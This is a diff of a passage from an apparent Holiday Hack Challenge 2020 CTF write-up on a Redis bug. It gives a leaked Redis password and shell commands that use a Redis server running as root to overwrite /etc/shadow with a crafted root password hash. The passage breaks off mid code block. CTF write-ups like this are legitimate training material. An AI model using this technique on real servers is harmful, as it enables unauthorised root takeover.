joergschwarzwaelder/hhc2020/Additional/Redis Bug Hunt.md

 ## Approach 2: Become root
 The Redis password can be found with the above method in the file maintenance.php, it is `R3disp@ss`.
 As the Redis server is running as `root`, we can overwrite `/etc/shadow` with new content.
-The `root` user's password is set to `Marie`.
+In this case the `root` user's password is set to `Marie`.
 ```
 player@95bbb6f62400:~$ printf "\n\nroot:cbMHDguL1fenw:16928:0:99999:7:::\n" > x
 player@95bbb6f62400:~$ redis-cli --raw -a 'R3disp@ss' -x set 1 < x